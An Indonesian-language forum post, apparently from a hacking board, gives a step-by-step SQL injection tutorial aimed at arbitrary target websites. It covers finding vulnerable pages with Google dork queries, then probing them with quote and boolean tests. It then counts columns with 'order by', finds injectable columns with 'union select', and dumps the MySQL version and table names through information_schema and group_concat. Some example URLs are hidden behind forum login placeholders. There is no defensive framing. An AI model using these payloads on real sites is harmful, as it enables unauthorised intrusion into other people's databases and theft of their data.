SQL Injectin adalah seni hacking dengan memanfaatkan dan memanipulasi perintah-perintah dari SQL itu sendiri.
1. Cari Target Mungkin anda bisa mencari link yang kayak gini : "http://www.sasaran.com/index.php?id=9", atau cari aja di google bisa kayak gini "inurl:index.php" ato "inurl:index.php?id=" ato yang lain deh terserah, pokoknya dapet target.
contoh pesan bug : You have an error in your SQL syntax
2. Test Bug tambahkan tanda petik (') di akhir URL, contoh :
[You must be registered and logged in to see this link.] gunakan perintah and+1=1-- ndi akhir url bila isinya tetap ada berarti coba lagi dengan and+1=2-- bila ga tampil brarti bisa di buat percobaan tuh webnya
3. Cari Table gunakan perintah "+order+by+" contoh : "http://www.sasaran.com/index.php?id=9+order+by+1"bila sampai order by 7 pesan kesalahan tidak hilang, namun order by 8 pesan kesalahannya hilang , berarti columbnya antara 1-7, namun masih harus di cari table berapa.
4. cari columb yang bisa di inject "+union+select+"contoh : "http://www.sasaran.com/index.php?id=9+union+select+1,2,3,4,5,6,7--" n ganti para meternya dari 9 menjadi -9"http://www.sasaran.com/index.php?id=9+union+select+1,2,3,4,5,6,7--"
cari sendiri pesannya,.!!
5. Intip Isi Website
[You must be registered and logged in to see this link.] bila kesalahan di columb 3
Cari versi my sQL
[You must be registered and logged in to see this link.] tergantung pesan kesalahan sebelumnya
bila muncul sql ver.5 itu lebih baik karena kita bisa menggunakan perintah "From+Information_schema", bila di ver.4 kita harus menebak table dan columbnya.
Tips:Injeksi Columb lebih dari 1 perintah
concat(perintah1,perintah2)
Menampilkan Table di web sasaran
gunakan :Group_concat(table_name) = digantikan pada anga yang keluar tadifrom+information_schema.tables-- = masukkan setelah angka terakhir
[You must be registered and logged in to see this link.] bila kesalahan di table 3
Lanjutkan Sendiri..., :DUse Your Brain..,
Converternya :
[You must be registered and logged in to see this link.]